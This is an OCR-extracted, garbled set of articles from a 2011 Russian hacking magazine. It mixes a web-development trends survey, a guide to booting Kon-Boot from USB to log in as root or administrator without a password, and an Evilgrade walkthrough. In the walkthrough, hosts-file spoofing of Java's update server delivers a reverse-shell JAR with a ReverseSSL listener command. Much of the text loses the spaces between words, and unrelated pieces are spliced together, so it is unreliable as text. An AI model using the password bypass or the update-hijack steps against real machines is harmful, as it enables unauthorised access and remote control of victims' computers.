книги хакеры / журнал хакер / 150_Optimized

Облачные интерфейсы на заметку

Если ты хочешь использовать возможности облачных сервисов в своих проектах, советую тебе воспользоваться некоторыми полезными вспомогательными инструментами.

Apache Nuvem (incubator.apache.org/nuvem) — попытка создать кроссплатформенный открытый интерфейс для работы с разны-

ми cloud-платформами, включая Amazon EC2, Microsoft Azure и Google AppEngine. В идеале, твоя программа сможет использовать ресурсы сразу нескольких облаков.

Deltacloud (incubator.apache.org/deltacloud) — решение на Ruby,

умеющее работать со всеми известными (и не очень) cloudпровайдерами. Предоставляет единый REST-интерфейс, который скрывает нюансы разных платформ.

libcloud (libcloud.apache.org) — библиотека для программ на Java или Python, которая взаимодействует реально чуть ли не со всеми в мире известными облачными платформами и унифицирует основные операции по созданию и управлению виртуальными машинами.

Simplecloud (simplecloudapi.org) — если ты все еще про-

граммируешь на РНР, то для тебя есть отличный компонент Zend_Cloud, который добавляет базовую поддержку хранилищ данных, очередей сообщений и другие фишки разных cloudплатформ просто в твое веб-приложение на Zend Framework или даже на чистом РНР.

уровнетакиебазыстроятсянабазехеш-таблициихразновид- ности— распределеннойхеш-таблицы(DHT). Благодаряэтому решенияnoSQL оказалисьнетолькооченьбыстрыми, ноещеилегко масштабируемыми. СвойстваDHT такие, чтоможноприсоединять новыесерверыпостоянно, итакаябазабудетрастиирасти. Столько, скольконадо. Приэтомвсамихприложенияхничегоменятьненадо, вседелаетсяавтоматически! Этооченьважно, потомучтоесли приложениенеможетодинаковохорошоработатьинаодном, ина тысячесерверов, тоононемасштабируемо. Азначитпринеожиданновысокойнагрузке, оноляжетиуженесможетвосстановитьработу, дажеприпокупкеновыхсерверов. ВтовремякакобычныеСУБД просторвутсяначастииподпираютсякостылями, чтобыработать хотьнапаредесятковсервероводновременно, практическилюбое noSQL-решениеможетспокойномасштабироватьсяхотьнатысячу серверов. Ивсеэтонаскоростяхболее100 тысячоперацийвсекунду, надгигабайтамиданныхимиллионамиключейнаобычномжелезе. Запримеромдалекоходитьненужно. Facebook используетсобствен- норучноразработанноеnoSQL-решениеCassandraаTwitter, которое опираетсявработенасвязкуCassandra итехнологииHBase.

Тренд2.JavaScript насторонесервера

Впогонезапроизводительностьюразработчикиактивноиспользуютнетольконовыеметодыхраненияданных, ноипрогрессивные

PHPFog — самый крутой облачный хостинг для твоего РНР-проекта

технологиидлянаписаниякода. Тутявныйтренд— болеепродвинутоеиспользованиеJavaScript. Непоймименянеправильно: конечно же, ниодинсерьезныйвеб-проектнеможетобойтисьбезбольшого количестваJS-кода. Реализацияфронтенда(т.е. интерфейсаприложения) практическивсегдареализуетсяименноспомощьюэтого языка, какаябытехнологияниприменяласьдлясозданиябэкэнда. Но! Пытливыеумыпочесалиголовыиподумали: анебудетлилегче использоватьJS болееуниверсально: инаклиенте, инасервере? Он гибкий, чтопозволяетписатькодвразныхпарадигмах: отобычного процедурногодоООПвсмесисфункциональнымстилем. Простой. Ночтоважнеевсего— егоасинхронностьинеблокируемость. Это важныйплюспосравнениюсо, скажем, обычнымPHP-скриптом, которыйнепременноблокируетсявовремявыполнения: например, вожиданиивыборкиизбазыданныхилиответаотдругого сервера. Кодвыполняетсяпоследовательно: поканебудетполучен ответ, сценарийбудеттупопростаивать. ВслучаесJavaScript ты простоуказываешь, какуюфункциюнеобходимовыполнить, когда произойдетопределенноесобытие, ивсе. Вэтовремядругойкод можетспокойновыполняться. Всестроитсянасобытияхифункциях, которыеэтисобытияобрабатывают(такназываемыеcallback’иили обработчикисобытий). Ктакомуподходунужнопривыкать, ночтобы сделатьжизньпроще, былиразработаныспециальныефреймворки. ОднимизсамыхпродвинутыхсталпроектNode.JS (подробнееонем тыможешьпрочитатьв139 номере][). ВосновееголежитV8, движок JavaScript, которыйиспользуетсявбраузереGoogle Chrome иблагодарякоторомуонработаетневероятнобыстро. Этонепустыеслова. КиспользованиюNode.JS меняподтолкнулпростойэксперимент. НаработеясделалпростенькийHTTP-сервер(нучестно, 10 строчек кода) ипопробовалегопротестироватьнанагрузку. Вситуации, когда ужепадалнашNginx-сервер, приложениенаNode.JS спокойнопродолжалоприниматьподключенияиработатькакнивчемнебывало.

Тренд3.Использование функциональныхязыков

Асинхронность— это, конечноже, конекнетолькоJavaScript. Для Python хорошиеребятапридумалифреймворкиTwisted иTornado,

дляRuby естьEventMachine, дляPHP — phpDeamon счестным fastcgi, дляJava — Netty. Нопомимопримочекдлясамыхобычных языковпрограммирования, всебольшуюпопулярностьнабирают функциональныеязыкииплатформы. Например, Erlang, который специальноразработандлясозданияраспределенныхсистемкомпаниейEricsson. Сейчаснайдетсянемалолюдей, которыескажут, чтоErlang рулитипрочихравныхобставляетвсехконкурентов, эффективнообрабатываясотнитысячпотоковиумелозанимаявсе доступныеядраисерверы. Инепростоскажут, априведутреальные

Github — социальная сеть для твоего кода. А система контроля версий и управления проектами — в придачу!

примеры. Однапроблема: втакомкодесамчертногусломает, аесли твойпрограммиствдругуйдет, топроектсбольшойвероятностьюна некотороевремявстанет. Специалистовпокаоченьмало. Ещеодно развивающеесянаправление— Scala. Этомощный, смешанный объектно-ориентированныйифункциональныйязыксостатиче- скойтипизациейивстроеннойпараллельностью. Шуткали, Twitter, наконец, слезсRuby-иглыипереписалбольшуючастькритичного коданаScala! Эточто-тодаозначает. Scala частоиспользуетсяв связкесплатформойAkka, длякоторойнечуждыпонятия«многопоточность», «устойчивостьксбоям», «распределеннаяархитектура», «реалтайм». Фреймворкоснованнараспараллеливаниивычисленийввидеакторов(небольшиеблокикода, которыесамостоятельно планируютсядляисполненияпоразнымядрам, процессамидаже узламкластера). Функциональныеязыкиактивноиспользуютсяв техпроектах, гдепользователюнужнаработавреальномвремени.

Тренд4.Реалтаймдлявеба

Да-да, длямногихвеб-приложенийсталокрайневажнымработать врежимереальноговремени, сминимальновозможнымизадержками. Задача, котораянепросторешаетсядажедлянескольких пользователей, становитсяогромнойпроблемой, когдасчетюзеров идетнасотнитысяч. Сейчасужеестьнемалорешений, позволяющихреализоватьреалтаймдлявеба(мырассказывалипро технологиюComet), носамойпрогрессивнойимногообещающей технологиейявляютсятакназываемыевеб-сокеты. Всеужеустали, чтовбраузереутебяестьтолькоHTTP иничегобольше, даитот урезанныйизатиснутыйвограничениябезопасности. Конечно, вражескийFlash заботливоподсуетилсяипредложилальтернативу, нокомуонтеперьнужен? Реализоватьреалтаймнаоснове привычногоHTTP оченьсложно: накаждыйчихемунужносоздаватьновоесоединение, сноваисновагоняяхотябыпарукилобайт данныхтуда-сюдаиожидаявсреднемполсекунды. Наделеимеем нереалтайм, аскореекостыли. Создателидесктопныхприложений потираютруки: уних-тоестьполныйдоступксистемеивозможность использоватьсетьнапрямуюнанизкомуровне. НовHTML5 (уже даженехочетсялишнийразегоупоминать) появитсярасширение WebSockets, котороереализуеттежесамыесокеты, новбраузере. Сокетыдлялюбоговеб-приложения— кактебе? Разсоединившись ссервером, тыможешьдержатьоткрытымканалпередачи(вобе стороны) сколькоугоднодолгоипересылатьпонемулюбыеданные. Беззадержекилишнихтормозов— всеограничиваетсялишьканаломсвязи. Кактолькоусерверапоявятсяновыеданныедлятебя,

тысразуихполучишь. Инаоборот. Увы, дополноценнойреализацииэтойтехнологииещедалеко. Многиеразработчикикинулись создаватьразличныепроекты, вешаянанихярлыкреалтайма. Но вотвчемпроблема: подходящегосерверадосихпорнет! Любимый Nginx, хотьидобравшийсяужедоверсии1.0.3, увы, никакнеумеет работатьссокетами. Простовсесуществующиевеб-серверапока неумеюткорректноработатьвситуации, когдаклиентынепростопришли, сделализапросиотвалилисьдоследующегосеанса связи(пустьдажеразвсекунду, померкамсервераэтооченьмного времени), апостоянновисятнасвязи. Воттут-тоипригодился новомодныйJavaScript насторонесервера. БлагодаряNode.JS подходящийсерверподчасможнонаписатьзавечер. Приэтомон будетдержатьстолькопостояннооткрытыхсоединений, сколько позволяттебересурсысервера(размерпамятиинастройкиядраОС исетевогостека).

Тренд5.Развертываемость ирасширяемость

Разужмывспомнилипроаппаратныересурсы, тосамоевремя поговорить, пожалуй, просамыйглавныйтренднетольковразработке, ноивообщевовсейIT-отрасли— облачныетехнологии. То, насколькоcloud-сервисыупростилижизньприсозданиисложных проектовсложнопереоценить. Простойпример— всемизвестныйсервисDropbox. Разработкинесталиизобретатьвелосипед

сразработкойтехнологиидляхраненияданных, аиспользовали облачныйсервисдляхраненияданныхAmazon S3. Тутвсепросто. Скольконадоместадляфайлов— столькоутебяибудет. Какаябудет нагрузка— такуюсервисивыдержит. Толькозакаждыйгигабайт хранилищаитрафикнужнозаплатить. Ссерверамивсеаналогично.

Документо-ориентированная система управления базами данных, не требующая описания схемы таблиц

Нужентолькоодин— пожалуйста. Нуженкластериз16 сервераков сразу— нетпроблем. Есливдругнагрузканаприложениеувеличиласьинужномасштабироватьсистему, тоэтоможносделать буквальнозанесколькоминут. Такуюуслугу, вчастности, предлагает всетажекомпанияAmazon (посути, этонастоящийлидеротрасли), предоставляятехнологиюEC2. Впрочем, многимвообщене нужныникакиесерверы— имважнаготоваяинфраструктурадля развертываниясвоихразработокиз«коробки». Хостингплатформы(Platform as a Service илиPaaS) — то, чтосейчаснабираетвсе большуюибольшуюпопулярность. Этонеудивительно. Добрые дядизатебяужепоставилиинастроиливсе, чтоможетпригодиться длятвоегоприложения. Взялинесколькоязыков, типаPHP, Ruby вместесRails, обязательныйPython ивыскочкуNode.JS, прицепили традиционнуюбазуданныхMySQL, ачтобыэстетызамолчали, добавилинемногоперчинкиввидеNoSQL — MongoDB, Redis илиRiak. Поверхпоставилиmemcached, авместоанахронизмаввидеFTP

— теперьпредлагаютюзатьраспределеннуюсистемууправления версийGit. Всеэтоуправляетсячерезкрасивыйвеб-интерфейс, в которомможнопростосказать: «Хочупятьсерверовmemcached, дваРНРиещебазуданныхзаверните». Тебетутжевыдаютключи доступаипароли— ивсе, можнодействовать. Команды«git clone && git push» — ивоттвоеприложениеужевольготносебячувствует насерверах, атыдаженеподозреваешь, начемигдеонокрутится. ПомимоэтогоразработчикампредлагаетсяспециальныйAPI, чтобы

Амазон нам не конкурент!

jQuery для мобильных устройств

программамогласамасебевыделятьресурсы, например, добавляяещеоднубазуданныхилиновыйинстансприложения. Среди автоматизированныхcloud-платформможновыделить: AppEngine, PHPFog, Azure, RackCloud.

Тренд6.Социализация разработчиков

ЯнезрявпредыдущемразделеупомянулGit. Постояннообщаясьвсредеразработчиков, неперестаюзамечать, какFTP иSVN стремительнотеряютпопулярность. Всепотихонькупереходитна Git. Поправилфайлик, добавилнемногогениальногокодаихочешь еговыкатитьнахостинг? СначалазакоммитьеговGit-репозиторий, напишикомментарий, чтохорошеготытамнакодил, апотомтолько развернинасервере, причемприпомощивсетогожеGit’а. Иведь действительноудобно: иразработка, идеплойидетприпомощи однойсистемы. Всевкоманднойстроке. ПосмотревнапопулярностьсервисаGithub (github.com), многиепровайдеры, чтобыпривлечьразработчиковиоблегчитьимжизнь, сталиразворачиватьу себяGit-репозиториикакединственнуювозможностьчто-тозалить насервер. Ну, теперьхотьнебудеткриков, чтосноваВасянето залилнасерверивсепересталоработать. Впрочем, используемый

032

Кодинг без границ

инструмент— этовсеголишьчастность. Самподходкразработке коданемногопоменялся. Еслираньшевсетвоидрузьясиделиуют- ноивтихарячто-тотампрограммировали, тотеперьбольшинство перебралосьнасервисывродеGitHub’аизанимаются«социальнымкодингом». СприходомGit’асталонамногопрощеследитьза прогрессомтвоихлюбимыхбиблиотек. Есличто-тонадосрочнопо- правитьвчужомкоде, такбезпроблем: кнопка«форк» теперьтакже близко, какикнопкадлясозданиятикета. Ачтобыавторзаморского чудапринялтвоиправки, ненужнодолгоналоманоманглийском объяснять, чтотысделалконфеткуизегонепонятногокода. Просто отправьемуспециальнуюзаявку(пулл-реквест), иесливсехорошо, твойкодбыстропопадаетвосновнуюветку. Github сталнастоящим прорывом, потомучтособралвоченьудобномвеб-интерфейсевсе, чтонадоматеромугику-программисту. Ичтоещеважно— ондобавилостроеблюдосоциальщины.

Теперьненужнывсеэтитвиттерыифейсбуки: длямногихразработчиков(преждевсегоOpensource) Github сталместомжизни, общенияитутже, неотходяоткассы, кодинга. Авсепотому, чтовыстраиваясредудлясовместнойразработкикода, Github непрячетлюдей завсемиэтимикоммитамиичекаутами, аактивноихвыталкивает наповерхность. Согласись, оченьприятновидетьсвоюаватарку илифоткувозлекаждогопринятогопатчавважныйпроект. Немогу неупомянутьипроновыесредыразработки, реализованныев браузере. Например, системуCloud9 (c9.io), котораяизящнодополняетGitHub ипозволяетреальновестиразработкуслюбогоместа, гдеестьинтернет.

Тренд7.Мобильныеплатформы

Последнийтрендвнашемматериаледиктуетсамовремя. Вебсервисывсечащеиспользуютсясмобильныхустройств. Портативныедевайсыметодичнозахватываютмир, поделивегомежду «яблочниками» и«роботами». Авотдизайнерамиразработчикам приходитсяподдерживатьобалагеря.

Ксчастью, сегодняпочтивсетоповыеJS-фреймворкиимеют мобильныеверсии(частосовместимыепоAPI собычнымивариациями), чтопозволяетпростозаменойфайлаподогнатьсайтпод требованиямобилок. СамыможидаемымявляетсяjQuery Mobile (сейчасдоступнатолькоalpha-версия), которыйпозаявлениям будетработатьнавсехмыслимыхинемыслимыхплатформах,

включаяэкзотикудлянас, типаBlackberry, Windows Phone, webOS, bada идругие. Будучирасширением, апобольшомусчету, очень крутымплагиномдляjQuery, онстандартизируетAPI дляразличныхустройствиихбраузеров. Кслову, вмобильноммиребраузеры

— этовообщеодинбольшойкошмар, такчтобраузерныевойны надесктопахэтотолькоцветочки. Помимоэтогоразработчикам предлагаютсястрогиеправилапосозданиюинтерфейсов, чтобы

веб-приложенияимелипонятныйстандартизированныйнаборэле- ментовинтерфейса, апользовательнеискалнасвоеммаленьком экранеполминутыкнопки«назад» или«отмена». z

XÀÊÅÐ 07 /150/ 2011

Это касается самых разных ОС. Есть даже универсальный инструмент — Kon-boot, который загружается с дискеты или CD и модифицирует память таким образом, чтобы без проблем залогиниться под администратором в Windows (включая

«семерку» с сервиспаком) и под root’ом во многих Linux-системах. Можешь легко убедиться в этом сам (естественно, на своем собственном компьютере и только в целях восстановления забытого пароля). Правда, на сайте разработчика по какой-то причине нет образа для записи на флешку, а загружаться с CD (и, тем более, с дискеты) уже как-то несерьезно. Можно со знанием дела создать загрузочную флешку из CD-образа (благо мы уже столько раз это делали для разных Linux-дистрибутивов), но с этим возникнут проблемы. Как сделать так, чтобы все заработало? Достаточно знать несколько нюансов.

1.Сначала устанавливаем последнюю версию утилиты UNetbootin (unetbootin. sourceforge.net) — пожалуй, лучшего решения для создания загрузочных флешек.

2.Далее необходимо скачать подходящую версию Kon-boot. Кажется, что сойдет CD-образ (как для многих других систем), но это неправильный выбор! Не наступай на грабли, от которых уже досталось многим другим. Все заработает только в том случае, если на флешку будет загружен образ для дискеты. Поэтому с сайта проек-

та (www.piotrbania.com/all/kon-boot) загружаем вариацию «Floppy image».

3.В конце концов заливаем образ на флешку с помощью UNetbootin, выбрав в качестве типа образа «Floppy».

4.Если теперь загрузиться с этой флешки, то ты непременно увидишь загрузчик

UNetbootin. Жми <Enter>, и на экране появится экран с надписью «krypto logic». Или не появится :). В последнем случае

— на флешку нужно закинуть отредакти-

рованный файл syslinx.cfg (bit.ly/mqKZ8R).

Это решит проблему, но несколько усложнит процесс загрузки. Теперь, после появления первого экрана syslinux, необходимо будет выбрать «1st Kon-Boot», а

после второго — «2nd try boot from drive C: as hd1». Если экран «krypto logic» так и не появится, то выбираем следующий вариант — «.. hd2» и т.д. В конце концов, все должно получиться.

5. После экрана «krypto logic» начнется загрузка ОС, которая установлена на компьютере. Только в отличие от обычной загрузки, ты сможешь беспрепятственно залогиниться в системе с максимальными привилегиями:

• для входа в систему Linux используй логин kon-usr:

Ubuntu 8.04 torpeda tty1 torpeda login: kon-usr

# id

uid=0(root) gid=0(root)

# whoami root

• для входа в Windows подойдет учетная запись любого существующего пользователя в системе, поля пароля при этом можно оставить пустым.

Проект Kon-Boot начинался как прототип хака, который на лету вносил изменения в ядро Linux и позволял таким образом зайти в систему под root’ом. Сначала появилась версия для Ubuntu, а после вышли плагины для многих других Linuxдистрибутивов. С недавнего времени Kon-Boot поддерживает еще и большинство Windows-систем. Примечательно, что проект написан на чистом ассемблере (TASM 4.0) и работает только на архитектуре X86-32. Дальнейшее развитие Kon-Boot разработчик видит в виде коммерческого продукта, который уже досту-

пен с сайта www.kryptoslogic.com и стоит денег, но зато имеет несколько полезных

1

Заливаем на флешку образ KonBoot

2

Загрузчик Kon-Boot в действии

3

Входим в систему под админом без пароля

доработок, в том числе возможность использования с любыми 32/64-битными

Windows-системами. z

Вспомни, какобычновыглядитсистемаавтоматическогообнов- лениякакого-топривычногоприложения. Программавкакой-то моментвыдаетсообщениевида: «Доступнановаяверсия. Пожалуйста, обновитесь», имычащевсегосразужедаемотмашкуна установкусвежегоапдейта.

Нозадумывалсялиты, чтотамскачиваетSkype илиJava? Едвали. Запускаяпроцессобновления, последнее, чегоможноожидать,

— этокакой-либоподставы. Какнепарадоксально, ноэтотсамый механизмдоставкиобновленийможетстатьуязвимымместомвсей системы. Причемречьидетнеокаких-толевыхподелкахгоре- программистов, аосерьезныхпродуктахсмиллионнойармией пользователей.

Гдеизъян?

Атакичерезсистемыобновленийприложенийизвестныдавно. Все деловтом, чторазработчикинесильноутруждаютсебязадуматьсяо безопасностимеханизмадоставкиобновлений. Чащевсегопроцесс автоматическогоапдейтавыглядитследующимнебезопаснымобразом:

•приложениеинициируетпроцессобновления(автоматическиили покомандепользователя);

•черезDNS запрашиваетсяхостасобновлениями(например, update.app1.com);

•DNS-сервервозвращаетадрессервера(например, 192.168.1.1);

•приложениезагружаетссервераспециальныйфайлсинформациейобапдейтах(например, lastupdate.xml), анализируетегои

Загрузка Evilgrade

определяет, чтодоступнановаяверсия;

• вконцеконцов, приложениескачиваетфайл http://update.app1.com/update.exe ивыполняетего.

Вотивсе. Никакихтебепроверокподлинностисервераобновлений, сверкицифровойподписискачанного файлаидругихэлементарныхдействий, которыемогли быобезопаситьпроцессобновления. Слепоедоверие— по-другомуненазовешь. Получается, чтоничтонемешает злоумышленникупритворитьсясерверомобновленийи отправитьприложениюфайл, которыйонозапустит. Полу- чаемклассическуюMITM-атаку, позволяющуюинжекти-

роватьнагрузкучерезсистемуобновлений, котораяреали- зуетсяспомощьюARP-спуфингалибопутем«отравления» DNS-кэша. Еслитыдумаешь, чтоэтопроблемалишь отдельныхприложений, тосильноошибаешься. ИсследовательФранцискоАматоизкомандыInfobyte Security Research (www.infobytesec.com/developments.html)

разработалнаPerl модульныйфреймворкспециальнодля реализацииатакчерезсистемуапдейтов. ИнструментназываетсяEvilgrade ивключаетвсебяготовыемодулидля эксплуатациинехилогоспискаизвестныхприложений:

•Teamviewer 5.1.9385;

•Notepad++ 5.8.2;

•Java 1.6.0_22 winxp/win7;

•Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675);

•Windows update (ie6 lastversion, ie7

7.0.5730.13, ie8 8.0.60001.18702, Microsoft works);

•Winamp 5.581;

•VirtualBox (3.2.8 );

•Filezilla;

•Flashget;

•Miranda;

•Skype;

•Trillian <= 5.0.0.26;

•Adium 1.3.10 (Sparkle Framework);

•VMware;

и т.д.

Каждыймодульотвечаетзаэмуляциюобновленияконкретногоприложения. ПомимоэтоговEvilgrade входят модули, реализующиеWeb- иDNS-серверы, которые

ПослеэтогоEvilgrade будетзапускатьсяиработатьбез сучкаизадоринки. ЕслитыужеиспользовалMetasploit, тодолгоразбиратьсясEvilgrade непотребуется: син-

Процесс общения приложения с сервером обновлений

таксискомандвомногомоченьпохож, авзаимодействиеосуществляетсятакжечерезинтерактивнуюконсоль. Можнозапуститьприложениеинабратьhelp, чтобыполучитьсписокдоступныхкоманд:

configure <имя модуля> — выбирает текущий модуль и позволяет настроить его параметры;

reload — перезагружает список доступных модулей; restart — перезапускает Web- и DNS-серверы;

set — устанавливает значение заданной переменной;

show — показывает информацию об объекте. Список доступных объектов:

options — псписок опций текущего модуля;

vhosts — псписок виртуальных хостов текущего модуля; modules — псписок всех доступных модулей;

active — пактивные модули;

start — пзапускает Web- и DNS-серверы; status — потображает статус Web-сервера; stop — постанавливает Web- и DNS-серверы;

Понимаю, чтоотэтогоспискапонятнееничегонестановится. Не волнуйся. Дальшепоходупримеравсестанетясно. Какяужесказал, средипродуктов, подверженныхданномувидуатак, естьдостаточно популярныерешения. Возьмем, например, Java, котораятребуетсядляработымногихпрограммидовольночастовстречаетсяна компьютерахпользователей, ипопытаемсясеепомощьюполучить доступкудаленномухосту. Думаю, этобудетхорошийпример.

Тестоваялаборатория

Итак, у нас есть два компьютера: один из них, с установленной Java, выступает в роли жертвы, другой (c Evilgrade) — в роли атакующего. Как ты помнишь, для успешного проведения атаки необходимо, чтобы при обращении к серверу обновлений, приложение «попадало» на компьютер атакующего, что обычно делается при помощи ARP-spoofing’а или DNS Cache Poison. Мы немного упростим себе задачу (чтобы в десятый раз не писать об одном и том же) и просто отредактируем файл hosts на машине жертвы, указав в нем в качестве адреса сервера обновлений адрес нашей атакующей машины:

192.168.1.2 java.sun.com

192.168.1.2 javadl-esd.sun.com

ТеперьвходидетEvilgrade. Запускаемего:

perl evilgrade

Чтобыпосмотретьсписокдоступныхмодулей, вводим«show modules». Списокдостаточновнушительный, естьизчеговыбрать, нонамнуженмодульsunjava. Далее, чтобысконфигурироватьего, вызываемсоответствующуюкоманду:

> conf sunjava

Посмотрим, какиепараметрымыможемпоменять:

> show options

Послечегополучаемследующуютаблицу:

Name = Sun Microsystems Java

Version = 1.0

Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"] Description = ""

VirtualHost = "(java.sun.com|javadl-esd.sun.com)"

Наиболееинтересноедлянасполе— этоagent, представляющееиз себяаналогполезнойнагрузки(payload) вMetasploit. Прощеговоря, тутмыуказываемфайл, который будетотправленжертвевкачестве обновления. Вданномслучае— этоFunnyClass2.jar. Этоreverseshell,

которыйинициируетсоединениес2010 портоматакующеймашины. Поэтомупередегоиспользованиемнадозапуститьприложение, котороебудетожидатьпопытоксоединенияна2010 порт. Дляэтогозайдем впапкуinclude\sunjava\JavaPayload\ ивыполнимкоманду:

java -cp "JavaPayload.jar:lib/*" javapayload.handler.

stager.StagerHandler ReverseSSL 192.168.1.2 2010 -- JSh

Теперьможновернутьсякконфигурациимодуля. Обративнимание наполяatitle иadescription. Тутзадаетсясообщение, котороебудет появлятьсявтрее, как толькоJava соединитсяснашимсервером инайдетсвежиеобновления, ипосле— впроцессевыполнения обновления. Всепараметрыданногомодуляможноизменить, используякомандуset. Заменим, кпримеру, заголовокинформационногоокна:

> set atitle "New version available"

Подобнымобразомможноменятьиостальныепараметры. Если теперьещеразввестикоманду«show options», томыувидимизменениявнастройкахмодуля. Посути, сейчасужеможносмело запускатьвсенеобходимоедляпроведенияатаки. Делаетсяэто командойstart.

Вручную запрашиваем обновления и получаем информацию о наличии «нашего» критического апдейта

Подменяем адреса серверов обновлений

Эксплуатация

Теперьпроверим, какэтовсеработает. Чтобыинициироватьпроцессобновлениянакомпьютережертвы, заходимвпанельуправления, запускаемJava, ивпоявившемсяокневыбираемвкладку «Update», нажимаемкнопку«Update Now». Весьпроцесс«общения» приложенияссерверомобновленийбудетотображатьсяв окнеEvilgrade. Посмотретьтекущеесостояниеможноспомощью команды«show status»:

client = 192.168.1.1 module = modules::sunjava status = send

(md5,cmd,file) = d9a28baa883ecf51e41fc626e1d4eed5,'', ".include/sunjava/JavaPayload/FunnyClass2.jar"

Онуказывает, чтоподдельноеобновлениебылоуспешноотправленонамашинусадресом192.168.1.1. Теперь, открыввторуюконсоль, ожидавшуюподключения, убедимся, чтобоеваянагрузкауспешно былавыполнена— имыимеемreverse shell кудаленномукомпьютеру. Можноввестикомандуhelp иувидетьсписоккоманд, доступныхквыполнениюнаудаленнойсистеме.

Детскиеболезни

Как видишь, даже серьезные приложения могут быть большой проблемой для безопасности компьютера. И пусть в них нет переполнений буфера или прочих ошибок, но неправильно реализованный механизм обновлений превращает их в этакий «черный

XÀÊÅÐ 07 /150/ 2011

Структура модуля Evilgrade

Надо понимать, что Evilgrade — это все-таки фреймворк для реализации атаки через обновления. Встроенные модули для популярных приложений являются примерами того, как его можно использовать. И их не так уж и много. Хочу рассказать немного об их структуре, чтобы ты имел представление, как такой модуль можно собрать самому. Поскольку сам Evilgrade написан на Perl’е, то любой модуль, по сути, представляет собой обычный Perl-скрипт, в котором мы:

1.Задаем имя модуля и подключаем необходимые пакеты:

package modules::sunjava; use strict;

use Data::Dump qw(dump);

2.Определяем переменную $base, включающую в себя все данные о работе модуля:

• имя модуля для отображения во фреймворке, версию модуля, версию уязвимого приложения, информацию об авторе модуля, краткое описание и список виртуальных хостов, с которых приложение пытается получить информацию об обновлении и файлы обновлений:

'name' => 'Sun Microsystems Java', 'version' => '2.0',

'appver' => '<= 1.6.0_22',

'author' => [ 'Name Surname < mail +[AT]+ mail.com>' ], 'description' => qq{},

'vh' => '(java.sun.com|javadl-esd.sun.com)',

• список запросов, которые будет посылать приложение нашему серверу обновлений с использованием регулярных выражений:

'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/

update/1.6.0/map\-m\-1.6.0.xml)',

• список опций, которые будут использоваться в ответах нашего сервера обновлений:

'options' =>

{ 'agent' => { 'val' => './agent/java/javaws.exe', 'desc' => 'Agent to inject'},

'arg' => { 'val' => 'http://java.sun.com/x.jnlp', 'desc' => 'Arg passed to Agent'},

'enable' => { 'val' => 1, 'desc' => 'Status'},

Полностью разобранный файл модуля с комментариями на русском языке ты можешь найти на DVD-приложении.

ход», которым кто-то может воспользоваться. Многие разработчики успели исправить некоторые детские болезни, немного обезопасив процесс обновления.

Увы, далеко не всегда это дает нужный эффект. Если поковыряться в исходниках модулей (о том, как они устроены, читай во врезке), которые идут вместе с Evilgrade, несложно найти места, где происходит обход примитивных проверок. Но каким должно быть безопасное обновление? Автор Evilgrade говорит о том, что сервер обновлений должен работать под https и поддерживать сертификаты, а само обновление должно обязательно содержать цифровую подпись, которую можно проверить по публичному ключу.

Вродебывсепросто, нопроблемапо-прежнемуесть. z

037